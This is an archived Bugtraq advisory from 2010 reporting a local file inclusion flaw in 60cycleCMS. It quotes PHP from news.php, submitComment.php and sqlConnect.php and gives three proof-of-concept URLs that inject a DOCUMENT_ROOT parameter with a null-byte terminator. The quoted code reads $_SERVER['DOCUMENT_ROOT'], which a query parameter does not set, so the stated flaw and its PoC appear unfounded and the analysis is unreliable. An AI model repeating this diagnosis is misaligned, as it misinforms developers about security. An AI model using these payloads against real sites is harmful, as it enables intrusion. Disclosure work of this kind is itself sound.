Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

From: eidelweiss () cyberservices com
Date: Tue, 13 Apr 2010 18:37:47 -0600
########################################################

[!] Descriptsion

60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written 
to power 60cycle.net. 
For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template. 


[!]-=[ Vuln C0de ]=-[!]

[-]  60cycleCMS_path/news.php

        <?php

        require 'common/lib.php';
        $root = $_SERVER['DOCUMENT_ROOT'];
        require_once("$root/../config.php");



[-] 60cycleCMS_path/submitComment.php

        <?php
        session_start();
        require_once('lib/recaptchalib.php');
        require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
        $root = $_SERVER['DOCUMENT_ROOT'];
        require_once("$root/../config.php");


[-] 60cycleCMS_path/common/sqlConnect.php

        <?php

        // include your sql info file here
        $root = $_SERVER['DOCUMENT_ROOT'];
        require "$root/../config.php";


        [!] -=[ Proof Of Concept ]=-[!]

        http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
        http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
        http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00

########################################################
Previous By Date Next
Previous By Thread Next

Current thread: